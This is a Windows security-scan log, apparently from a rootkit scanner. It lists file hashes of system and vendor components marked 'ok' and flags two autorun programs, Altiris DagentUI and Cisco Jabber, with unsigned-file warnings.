15:34:01.0588 0x04bc  [ 741872AD9F03B7F0EC8BA73B22993884, CAE6DFDBC84BA3F92547F81E343DA1CCF3FCD2F04A7E3A13282CD4D17D9795A9 ] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgr.dll
15:34:01.0588 0x04bc  C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgr.dll - ok
15:34:01.0590 0x04bc  [ 502D419765D2AACC963680E077E19A95, 5500A20A2950A095A0C6F3A1BF561126CA06964B382549AEA16B3DC1989C7C33 ] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
15:34:01.0590 0x04bc  C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll - ok
15:34:01.0592 0x04bc  [ 300A0BE0401E783787DD38D4ED408081, 53A1A11E7703FC206981787A3F654C49ABA6ABABE953CF198024CF366A865241 ] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\ISDI.dll
15:34:01.0592 0x04bc  C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\ISDI.dll - ok
15:34:01.0594 0x04bc  [ 7200DCA324F3D1ECD11B2B1250B2D6C7, 636E12FEA8C47EA528DBA48827AC51A2E98B2EF0864854C9375B8170555C0A6E ] C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\msvcm90.dll
15:34:01.0594 0x04bc  C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\msvcm90.dll - ok
15:34:01.0596 0x04bc  [ 07E182AA3ED9DF0166F72B40DCC2CBA1, 7A344551575EEC33AD2BFF40B5AE8FBB55467D14F2620C6C34457941BB2D184B ] C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\d97a5aa0eb7697aca7c6e90ae471af2b\WindowsBase.ni.dll
15:34:01.0596 0x04bc  C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\d97a5aa0eb7697aca7c6e90ae471af2b\WindowsBase.ni.dll - ok
15:34:01.0598 0x04bc  [ A2F608F2BF88A122ABD43648B9B22BDE, 6749008CE2E486A6A11FFD208D30A69EBC403C025FC529CAD7C00C94A2A2AF6B ] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorCommon.dll
15:34:01.0598 0x04bc  C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorCommon.dll - ok
15:34:01.0600 0x04bc  [ 2A0DA1B8F48E7F3C9337E5463CEABB8D, 581C95B02DFD1300875ED2F61E65A682CABD1375251C10254F744E5D5A1A8B08 ] C:\Windows\System32\sppsvc.exe
15:34:01.0600 0x04bc  C:\Windows\System32\sppsvc.exe - ok
15:34:01.0602 0x04bc  [ FFF95479C7AB1550F0750A5D01744211, FF67F892AABCE1C2B695FF4C0816339566F5745C1498D48FAC050E5196C1CE09 ] C:\Windows\System32\drivers\spsys.sys
15:34:01.0602 0x04bc  C:\Windows\System32\drivers\spsys.sys - ok
15:34:01.0604 0x04bc  [ 6976F63C95C1C34AF794B3C1550192E8, C37C529F012EB2A3C88BDB72FDE42D54F818C8023AD0A6E6D3E3888D3E7CD2DA ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Web\b4001d722e320fa42cd87b04b5249b2d\System.Web.ni.dll
15:34:01.0604 0x04bc  C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Web\b4001d722e320fa42cd87b04b5249b2d\System.Web.ni.dll - ok
15:34:01.0606 0x04bc  [ 34DDC8B2BD7E8841AA542BBFB01C1384, 560301F5FE840F1EDE11E9A5A8C5ED95F2EC405C8DA60DDD4D4C3AAA0D0C5A5B ] C:\Program Files\Common Files\Altiris\AeXNSEvent.dll
15:34:01.0606 0x04bc  C:\Program Files\Common Files\Altiris\AeXNSEvent.dll - ok
15:34:01.0608 0x04bc  [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] C:\Windows\System32\alg.exe
15:34:01.0608 0x04bc  C:\Windows\System32\alg.exe - ok
15:34:01.0610 0x04bc  [ 9A262EDD17F8473B91B333D6B031A901, 05DFBD3A7D83FDE1D062EA719ACA9EC48CB7FD42D17DDD88B82E5D25469ADD23 ] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
15:34:01.0610 0x04bc  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe - ok
15:34:01.0612 0x04bc  [ B4D73F04E9BC076F7CDAC4327DF636BB, 1ADED20D5A0D0A76E2F85CB778FD06BAB814868D35F8532E17D67045FF4770C2 ] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
15:34:01.0612 0x04bc  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe - ok
15:34:01.0614 0x04bc  [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] C:\Windows\ehome\ehrecvr.exe
15:34:01.0614 0x04bc  C:\Windows\ehome\ehrecvr.exe - ok
15:34:01.0615 0x04bc  [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] C:\Windows\ehome\ehsched.exe
15:34:01.0615 0x04bc  C:\Windows\ehome\ehsched.exe - ok
15:34:01.0617 0x04bc  [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] C:\Windows\System32\msdtc.exe
15:34:01.0617 0x04bc  C:\Windows\System32\msdtc.exe - ok
15:34:01.0618 0x04bc  [ D5BA242D4CF8E384DB90E6A8ED850B8C, CB4CB2608B5E31B55FB1A2CF4051E6D08A0C2A5FB231B2116F95938D7577334E ] C:\Windows\System32\Locator.exe
15:34:01.0618 0x04bc  C:\Windows\System32\Locator.exe - ok
15:34:01.0620 0x04bc  [ 3CBDEC8D06B9968ABA702EBA076364A1, B8DAB8AA804FC23021BFEBD7AE4D40FBE648D6C6BA21CC008E26D1C084972F9B ] C:\Windows\System32\UI0Detect.exe
15:34:01.0620 0x04bc  C:\Windows\System32\UI0Detect.exe - ok
15:34:01.0622 0x04bc  [ 8D6B481601D01A456E75C3210F1830BE, A2CEF483F4231367138EEF7E67FD5BE5364FC0780C44CA1368E36CE4AA3D0633 ] C:\Windows\System32\vds.exe
15:34:01.0622 0x04bc  C:\Windows\System32\vds.exe - ok
15:34:01.0623 0x04bc  [ B60BA0BC31B0CB414593E169F6F21CC2, 47B801E623254CF0202B3591CB5C019CABFB52F123C7D47E29D19B32F1F2B915 ] C:\Windows\System32\VSSVC.exe
15:34:01.0623 0x04bc  C:\Windows\System32\VSSVC.exe - ok
15:34:01.0625 0x04bc  [ 3CEC96DE223E49EAAE3651FCF8FAEA6C, 4150DAB33E8D61076F1D4767BCAFC9B4ECCCCBD58FD4FB3CFE5B8D27DCDCAB61 ] C:\Windows\System32\Wat\WatAdminSvc.exe
15:34:01.0625 0x04bc  C:\Windows\System32\Wat\WatAdminSvc.exe - ok
15:34:01.0627 0x04bc  [ 0B4B3598A1750E115545D67AFA02B90C, F71F81A31CF9853DB26CAA54F6813920436322A5FBD0F8DEBF9A137EE04D4032 ] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorUIHelper.dll
15:34:01.0627 0x04bc  C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorUIHelper.dll - ok
15:34:01.0629 0x04bc  [ F6F22291024906E43D135A4B1705FEAC, C1B66012799D247033E8AB8386B51BC86A4E2255E6D0B163AC000B215C51B42A ] C:\Windows\System32\sppwinob.dll
15:34:01.0629 0x04bc  C:\Windows\System32\sppwinob.dll - ok
15:34:01.0631 0x04bc  [ 01ED205C71479FB08F63B3CA7CAB02F8, CAD9ADFFA0315FB55AE2FC2ECC3EF1812D2080AB1F8014B0AA2892A59A35AE60 ] C:\Windows\System32\sppobjs.dll
15:34:01.0631 0x04bc  C:\Windows\System32\sppobjs.dll - ok
15:34:01.0633 0x04bc  [ 172FB5EDCDD415A64A7C338E42AAB66C, 795CED9C3E03B0205C5616AB9FAE7933DF50450D4CC20945840EBF7AB70238D0 ] C:\Program Files\Altiris\Altiris Agent\AeXAgentPages.dll
15:34:01.0633 0x04bc  C:\Program Files\Altiris\Altiris Agent\AeXAgentPages.dll - ok
15:34:01.0635 0x04bc  [ 8471886A4F0FFC9E63DBE6E275522491, 58D65355FEC3BBF78403231BF453FBB344813368B7AB30807B803FD7E20F613E ] C:\Program Files\Altiris\Altiris Agent\Agents\PatchMgmtAgent\PatchMgmtAgentsUI.dll
15:34:01.0635 0x04bc  C:\Program Files\Altiris\Altiris Agent\Agents\PatchMgmtAgent\PatchMgmtAgentsUI.dll - ok
15:34:01.0637 0x04bc  [ 66C87DB880052104808507D6FA84D68E, 46BD5C16225B3D0BF786FDA6461CE9A549DAA9FA38C8BDADAA0AF08FA6A24260 ] C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
15:34:01.0637 0x04bc  C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL - ok
15:34:01.0639 0x04bc  [ 0D7BE936A44E6B70F822D272A5CEBC22, 280E44BF707AD46DB480287975BFDC58C416E05193171836610FBFA2FFBA8AF3 ] C:\Windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\msvcr90.dll
15:34:01.0639 0x04bc  C:\Windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\msvcr90.dll - ok
15:34:01.0641 0x04bc  [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] C:\Windows\System32\wscsvc.dll
15:34:01.0641 0x04bc  C:\Windows\System32\wscsvc.dll - ok
15:34:01.0642 0x04bc  [ 92E0508D924512F63FFEEFE498CBD11F, 1158011E4A1298DEC79133B40888AA87B06F5B64BA2AB461B58C22F5F9211D0C ] C:\Windows\System32\p2pcollab.dll
15:34:01.0642 0x04bc  C:\Windows\System32\p2pcollab.dll - ok
15:34:01.0644 0x04bc  [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] C:\Windows\System32\QAGENTRT.DLL
15:34:01.0644 0x04bc  C:\Windows\System32\QAGENTRT.DLL - ok
15:34:01.0646 0x04bc  [ 506A83A3BEEE9FCA09F0170DE9FC7D1B, 2DFBD792B68F3EBEF0843183CAE5D52B6FA04163808AFACF6C0D738455898C36 ] C:\Windows\System32\fveui.dll
15:34:01.0646 0x04bc  C:\Windows\System32\fveui.dll - ok
15:34:01.0648 0x04bc  [ C47F35CC6FA4F1BDBEF8F87AC1A46537, 82EC7041317666D5370690BD2176CF00F5957036C29429319F45045BFFAE9EC2 ] C:\Windows\System32\wuapi.dll
15:34:01.0648 0x04bc  C:\Windows\System32\wuapi.dll - ok
15:34:01.0649 0x04bc  [ FA43D418BC945D27D0625B697B8442B5, 035DE0FEA440D2E3AD255EE84B388DDA538E778877033FDB54B8A61BB0AADE56 ] C:\Windows\System32\cabinet.dll
15:34:01.0649 0x04bc  C:\Windows\System32\cabinet.dll - ok
15:34:01.0651 0x04bc  [ E746ED90132C6B6313CE9179F56BD31D, CCE0367148E54AA1413C52CCE752CC75EA9E3A8232ECFC263C62A634B8CAEF5F ] C:\Windows\System32\wups.dll
15:34:01.0651 0x04bc  C:\Windows\System32\wups.dll - ok
15:34:01.0653 0x04bc  [ D9EF901DCA379CFE914E9FA13B73B4C4, 3BE9693B7B2AFEE23D72AF5DA211379724D752F0EC18ACB7D3DE3DDFC5AE0004 ] C:\Windows\System32\wuaueng.dll
15:34:01.0653 0x04bc  C:\Windows\System32\wuaueng.dll - ok
15:34:01.0655 0x04bc  [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] C:\Windows\System32\drivers\asyncmac.sys
15:34:01.0655 0x04bc  C:\Windows\System32\drivers\asyncmac.sys - ok
15:34:01.0657 0x04bc  [ 617F6EC0AC677C685479C1D0D1E76C6F, 77B22C0817558CE70EF7D3BBE04A275FFA35ED2E4AFB17DBDF353DF9932DC693 ] C:\Windows\System32\mspatcha.dll
15:34:01.0657 0x04bc  C:\Windows\System32\mspatcha.dll - ok
15:34:01.0659 0x04bc  [ 7FE0D0C8F53735EA17C9AE93EFE7AD5A, 7F67FE1E0453CCCFA5097BFC9087BA5F4B213CCA8AC17FC05D7ED02A52112E05 ] C:\Windows\System32\wups2.dll
15:34:01.0659 0x04bc  C:\Windows\System32\wups2.dll - ok
15:34:01.0661 0x04bc  [ 631FC4D7CCF831E5381A3DCE0957919C, 49BC592C785BBF441118C5AF8111439EDC8BDACF5303555DE9AD525428715DF2 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll
15:34:01.0661 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll - ok
15:34:01.0663 0x04bc  [ 0D1869C0B91391C05C9D2DA5E2F53978, 141F783530B3C432F3CACF03F6617EF39F37850F95D08B3721CA0E23ECD0791F ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\WsmanClient.dll
15:34:01.0663 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\WsmanClient.dll - ok
15:34:01.0665 0x04bc  [ 9AF404BDC289CDB94F1EEAB1D59162C3, F40C36F8DD9277D1927EF1E96F8FA62C422C572DDCF2DCF5759E2C641872A805 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\Common.dll
15:34:01.0665 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\Common.dll - ok
15:34:01.0667 0x04bc  [ 76B43346EB456AA6282B941452152001, 944EF86EAC207D6E87BF19301B05FA00FF5876E680F8F4CC8746745229954089 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\GmsCommon.dll
15:34:01.0667 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\GmsCommon.dll - ok
15:34:01.0669 0x04bc  [ C072E0A6E6471C557D7F996326A3628F, BEF6278C4BC81AD5B8CBBBB82C1FA50E0A884252372E0B6DD73F77573EED7B25 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\Configurator.dll
15:34:01.0669 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\Configurator.dll - ok
15:34:01.0671 0x04bc  [ 3A1ABE045A3E30799576E83A2D012B43, 463585DE9CD1C031EFBD2FFC62C7E2001B30ECCBE9FA61084E1A50F23CC27FAE ] C:\Windows\SysWOW64\wdigest.dll
15:34:01.0671 0x04bc  C:\Windows\SysWOW64\wdigest.dll - ok
15:34:01.0673 0x04bc  [ C60FD096689F342F9F48322A93904494, 144C67271ED130523686CAD8CA84DB4A4FE0340281C7892284E84398C2AB699C ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\EventManager.dll
15:34:01.0673 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\EventManager.dll - ok
15:34:01.0675 0x04bc  [ 9D862DD68F47AB53C8DCD09D4E8EF331, FFBCFE427D9F2800BACCEE48837804531D54E7C4FBEAE75DF5B87A0FC23E29A7 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\SoapServerService.dll
15:34:01.0675 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\SoapServerService.dll - ok
15:34:01.0677 0x04bc  [ AE274BCD574D2AEAEC996F13731D348F, 8781A76CDBCB7F1D57594A88FC21FB1F5B4F94062B86BA0BE9A73305506E8DF7 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\PartialFWUpdateService.dll
15:34:01.0677 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\PartialFWUpdateService.dll - ok
15:34:01.0679 0x04bc  [ 59EC2C709AD452B471879944504DC0B8, F7F5E22EB2BAF17AE66A9D33DE783A147BC4EE931F6A3854AD8E274EFE7B03A3 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\IPRefreshService.dll
15:34:01.0679 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\IPRefreshService.dll - ok
15:34:01.0681 0x04bc  [ 9DF4676991A4D47CD29B6C4EE4FFFA9A, 033E4920E56AAE338A8A78385279A8E61554905855AB6F2600E96A35F4EE7CD8 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ComEventHandler.dll
15:34:01.0681 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ComEventHandler.dll - ok
15:34:01.0683 0x04bc  [ AFA8B161C669C7E7BF9C9E88627D2717, E7FED82DFB28A05DCBD969086B150A285351DCD219CDE99AF1D38F9EC146F9E0 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\HistoryEventHandler.dll
15:34:01.0683 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\HistoryEventHandler.dll - ok
15:34:01.0685 0x04bc  [ 322E75898F8F6B73CF1346BE58E3B39F, 2C9BAF4C8C3DC101E14E50A019A07A24E1DCA30A47C6A82D0DE655F19E356465 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\StatusEventHandler.dll
15:34:01.0685 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\StatusEventHandler.dll - ok
15:34:01.0688 0x04bc  [ CD222BFAF0CB9202BFB1464CD3EC4E37, 8F2CDD6F6662C7C8BDF71E397AF15716EEE15A44FF847E8522A9EB97AF4726DC ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\WMIEventHandler.dll
15:34:01.0688 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\WMIEventHandler.dll - ok
15:34:01.0690 0x04bc  [ C659DF0E54F45CAB8F2383E8920A2733, 6E79F495CD4BEEA29925450107B4E2555F4DCA1B7FF8683DDCE31BC0D1527CDB ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\WinLogEventHandler.dll
15:34:01.0690 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\WinLogEventHandler.dll - ok
15:34:01.0692 0x04bc  [ C02F50BBC064689FE3FCD89348C884EB, 9E262C3CACE20363A37CAD6E438FA2747A056B3CABBCA231C89FF56610544BC6 ] C:\Windows\SysWOW64\netfxperf.dll
15:34:01.0692 0x04bc  C:\Windows\SysWOW64\netfxperf.dll - ok
15:34:01.0693 0x04bc  [ 315E419ABD7CFB244D1872B44A0C358D, DC5FE0BA41815CBCCE72AC16376E008CF3A6EBC1B44B63380DB687003CBF8C88 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\PerfCounter.dll
15:34:01.0694 0x04bc  C:\Windows\Microsoft.NET\Framework\v4.0.30319\PerfCounter.dll - ok
15:34:01.0695 0x04bc  [ 395AA43545B73C39A9BC4BD7502A6146, 3C9EDB65193840C3F7D8555D84F882115DA97F2A20E30D2E1FF33A2D496BD4E5 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\CORPerfMonExt.dll
15:34:01.0696 0x04bc  C:\Windows\Microsoft.NET\Framework\v4.0.30319\CORPerfMonExt.dll - ok
15:34:01.0697 0x04bc  [ CC9B428BED0D6A451F5A30FEE5B4D18B, 3EB7FF88718C621DF9A61783DB5F53F0816F062FD0E4275A7E8F018077D7F004 ] C:\Windows\SysWOW64\aspnet_counters.dll
15:34:01.0697 0x04bc  C:\Windows\SysWOW64\aspnet_counters.dll - ok
15:34:01.0699 0x04bc  [ AB236FEFED6F80889B84893E4229A3E6, 88C58590A7D62DA81E4B2E3BD0CF0A596E4460152418DF1DC65849E284F61450 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_perf.dll
15:34:01.0699 0x04bc  C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_perf.dll - ok
15:34:01.0701 0x04bc  [ 82DCD6037F35073A6EC1EE397D808135, 90981DD1F8F8820EB10226703D0833595233B6351B70F5F49D62A0953157BCD7 ] C:\Windows\SysWOW64\msvcr120_clr0400.dll
15:34:01.0701 0x04bc  C:\Windows\SysWOW64\msvcr120_clr0400.dll - ok
15:34:01.0703 0x04bc  [ 0552A8684BF7566F744D5B19FF6AEC6B, D1EB44C75A0AE0C9ABFE3B1B7AD648DF77B56B4358E522DFF732911906B20B49 ] C:\Windows\SysWOW64\bitsperf.dll
15:34:01.0703 0x04bc  C:\Windows\SysWOW64\bitsperf.dll - ok
15:34:01.0705 0x04bc  [ 8C9179609935F84202028849112D355A, FBDD3BB4BF8F6854AA4E7E6AD4F86EA3E62363C86D87D2DE884DC343A58C7D07 ] C:\Windows\SysWOW64\esentprf.dll
15:34:01.0705 0x04bc  C:\Windows\SysWOW64\esentprf.dll - ok
15:34:01.0707 0x04bc  [ E991956ACE9E57BFB9F8BB077D11B34E, FF7D5652E9A20D5B757B2DE83B1B4E9439D40B12B2456FDB786C3C040A765847 ] C:\Windows\SysWOW64\msdtcuiu.dll
15:34:01.0707 0x04bc  C:\Windows\SysWOW64\msdtcuiu.dll - ok
15:34:01.0709 0x04bc  [ 19B8C44BC54C7859E57E0EC1312D5B92, F1117313A292B3D05712585328D007156474BE491E19A7215A7E85645885AF96 ] C:\Windows\SysWOW64\msdtcprx.dll
15:34:01.0709 0x04bc  C:\Windows\SysWOW64\msdtcprx.dll - ok
15:34:01.0710 0x04bc  [ 8483DD8F87DBE86AAB55BBF95C207061, D18080095DACEBA219D5839C04AB7FBF960BE2D41AFF164A153130EB849EF1C1 ] C:\Windows\SysWOW64\mtxclu.dll
15:34:01.0710 0x04bc  C:\Windows\SysWOW64\mtxclu.dll - ok
15:34:01.0712 0x04bc  [ AE9898D5600A232CD8AE3298692162E5, 8B94BA9C404B8A21CE023335960E77C73245FB30015161EEFF48573DDB7E6922 ] C:\Windows\SysWOW64\clusapi.dll
15:34:01.0712 0x04bc  C:\Windows\SysWOW64\clusapi.dll - ok
15:34:01.0714 0x04bc  [ 2AF094C822BD6094F14A8E85FB51D52A, F70A4FEC66E64245237D9D1A4C2C87168A26F224FCE648A3D7065E95259887D2 ] C:\Windows\SysWOW64\resutils.dll
15:34:01.0714 0x04bc  C:\Windows\SysWOW64\resutils.dll - ok
15:34:01.0716 0x04bc  [ 2DC6285EC4F902BE08E7C5FA6D3FD017, 2EBE3906BD3D53DFBD792104E5DC053BFDD1E05459C20AE587E2D093CE7C3B63 ] C:\Windows\SysWOW64\msscntrs.dll
15:34:01.0716 0x04bc  C:\Windows\SysWOW64\msscntrs.dll - ok
15:34:01.0717 0x04bc  [ B92E9318F7E4AEF633B8EC3A873565AF, DA378AE1283B941B4251B7DD37FB21F37F7282750D94900D96EE413ADD316883 ] C:\Windows\SysWOW64\perfdisk.dll
15:34:01.0717 0x04bc  C:\Windows\SysWOW64\perfdisk.dll - ok
15:34:01.0719 0x04bc  [ 1ACC2484F3F111D577ABE4FFB1CAF2A5, 7B93481DD6BE2021C7C7B939FB90C430CB70E1BE4A14E24A8D4D34EEA5AE5F15 ] C:\Windows\SysWOW64\perfnet.dll
15:34:01.0719 0x04bc  C:\Windows\SysWOW64\perfnet.dll - ok
15:34:01.0721 0x04bc  [ 72910F1DEB838E6E08A9017BFB7D4F0B, A2EAE06069778605765ECB4734760BA296707ED6E166F85F31603F5D79ACC125 ] C:\Windows\SysWOW64\browcli.dll
15:34:01.0721 0x04bc  C:\Windows\SysWOW64\browcli.dll - ok
15:34:01.0722 0x04bc  [ 6FA41E0C86EF049A12C05CA4BBA8F9AF, D18758C5A33B4C596EA6E87A16B53D7CF68EA9586C7F11C9518577BC8D7CBC9B ] C:\Windows\SysWOW64\perfos.dll
15:34:01.0722 0x04bc  C:\Windows\SysWOW64\perfos.dll - ok
15:34:01.0724 0x04bc  [ 752F8E96BAB993517838315508FB82CB, E2D40BC51CAA147EBCEB9898D3D75540CEF83376E088942D289CD58FFAE654DE ] C:\Windows\SysWOW64\perfproc.dll
15:34:01.0724 0x04bc  C:\Windows\SysWOW64\perfproc.dll - ok
15:34:01.0726 0x04bc  [ 6E608664EBEEAB5A03BA32324016695B, 1137E97697E85D866622AA1F6AA2F08F9DFECABED9652A997F44E65B2F5D72EF ] C:\Windows\SysWOW64\rasctrs.dll
15:34:01.0726 0x04bc  C:\Windows\SysWOW64\rasctrs.dll - ok
15:34:01.0728 0x04bc  [ 5BBD1F824741AA1FDA9A9DFD3A9D5416, C9F3EAA48AF158A3377ADD36EA8C0C115A562BCF323D3D4AF41BD7C62285B39B ] C:\Windows\SysWOW64\tapiperf.dll
15:34:01.0728 0x04bc  C:\Windows\SysWOW64\tapiperf.dll - ok
15:34:01.0729 0x04bc  [ EDD2AD141DEBD425D74A52A4D7BE6AC4, DB32FA1033D9F1231E8A51CA345AD9EB47D08626127EBBEDCEF13D40DAA64FFD ] C:\Windows\SysWOW64\perfctrs.dll
15:34:01.0729 0x04bc  C:\Windows\SysWOW64\perfctrs.dll - ok
15:34:01.0731 0x04bc  [ FB1BA42D1A1440E99C6B8667E141CFB1, 9ABE7692169AF82150F9B33FB197363DFC37A5DA280E2C53722F9FF4AC68EA95 ] C:\Windows\SysWOW64\perfts.dll
15:34:01.0731 0x04bc  C:\Windows\SysWOW64\perfts.dll - ok
15:34:01.0733 0x04bc  [ D25958B2A71EF488959272878EF934BE, 3DD6204CDBB2AA9A1C61907E37F37ABDA06091C62E53DEFCFB2DF6791B9EFEF2 ] C:\Windows\SysWOW64\utildll.dll
15:34:01.0733 0x04bc  C:\Windows\SysWOW64\utildll.dll - ok
15:34:01.0735 0x04bc  [ 109007869CB95CBD9B92FDF35B96D7B5, 397228F01E7808C3883248D89D9A6E462857971F2FF2A456143EB30001F6BCE3 ] C:\Windows\SysWOW64\usbperf.dll
15:34:01.0735 0x04bc  C:\Windows\SysWOW64\usbperf.dll - ok
15:34:01.0737 0x04bc  [ 60DB14C8F7AAE1D309A766E0833EC7F3, FFA9276AD9A909E875249E7D52078ADBD9C0C958EFC73684935DC401840111A8 ] C:\Windows\SysWOW64\wbem\WmiApRpl.dll
15:34:01.0737 0x04bc  C:\Windows\SysWOW64\wbem\WmiApRpl.dll - ok
15:34:01.0738 0x04bc  [ 529879612A7FAE235914E3AA6A9A669C, 715843BDDCB7BFB9C6A968F6DC7BBDE0844883FD57CB72608E2D7352F385C7A8 ] C:\Windows\SysWOW64\loadperf.dll
15:34:01.0738 0x04bc  C:\Windows\SysWOW64\loadperf.dll - ok
15:34:01.0740 0x04bc  [ 9FE3ED67345F0FF829A4A53B90E09672, F70CD131DCF101B26CD55A57876DB3765B3E15C9D3A8B508FF041C91226EC504 ] C:\Windows\System32\loadperf.dll
15:34:01.0740 0x04bc  C:\Windows\System32\loadperf.dll - ok
15:34:01.0741 0x04bc  ================ Scan generic autorun ======================
15:34:01.0780 0x04bc  [ 70D2D88F5301B21488708A1F1A263D4F, 1F9B7617757A13C1E6CEE94F4714AE58CD087E550883AFE125E4C9BE379008F6 ] C:\Windows\system32\igfxtray.exe
15:34:01.0788 0x04bc  IgfxTray - ok
15:34:01.0826 0x04bc  [ 68B83F92E02584FF5CB7B80CACDC8C24, 3457D61A7F15C2EE508203A93AE0171AA153EB5A6FF671556387B1965AA07F0E ] C:\Windows\system32\hkcmd.exe
15:34:01.0837 0x04bc  HotKeysCmds - ok
15:34:01.0900 0x04bc  [ 2AC55814155D090E84EB8188F73CDBA7, B4D49C2E8AE191901D38CA32C58B390F7735F60E17B080B061C3347E504AE188 ] C:\Windows\system32\igfxpers.exe
15:34:01.0911 0x04bc  Persistence - ok
15:34:02.0322 0x04bc  [ B10B692825D7FAE41CB7C3F92AE17233, C1F7B347CF04D5881E2F17FFB5C7AB8DD0EB83261166D0AD94E4C8843E2863A2 ] C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
15:34:02.0369 0x04bc  RtHDVCpl - ok
15:34:02.0416 0x04bc  [ 6B174167E5F313609D578B03BF697D0A, B8F8EDB15FF8A9DEB43F97C29E88FEE730D1A1807918ED1E8F95456328B3D90C ] C:\Program Files\Altiris\Dagent\dagentui.exe
15:34:02.0462 0x04bc  DagentUI - detected UnsignedFile.Multi.Generic ( 1 )
15:34:02.0462 0x04bc  DagentUI ( UnsignedFile.Multi.Generic ) - warning
15:34:02.0602 0x04bc  [ F8857019B23468654F3AB34482F9740E, E36784A08134136ADDAE22C1EA2B32683384DEBE963B341424612A4166536A64 ] C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CiscoJabber.exe
15:34:02.0618 0x04bc  Cisco Jabber - detected UnsignedFile.Multi.Generic ( 1 )
15:34:02.0618 0x04bc  Cisco Jabber ( UnsignedFile.Multi.Generic ) - warning
15:34:02.0711 0x04bc  [ BDDAFDB5F9517DFE97AD3750CF343819, 4DA9A1FE099CE2EF9F3BA2F30B391B2720806BB815D79CE7C0BEC101399B37FE ] C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
15:34:02.0727 0x04bc  USB3MON - ok
15:34:02.0758 0x04bc  [ 766AE515B1749F2141E418CC6C08515B, 02DDB5A7DB8278AA47A951604818E73DB69155DBF1ECD06B6E11926204EADAE7 ] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
15:34:02.0758 0x04bc  IAStorIcon - ok
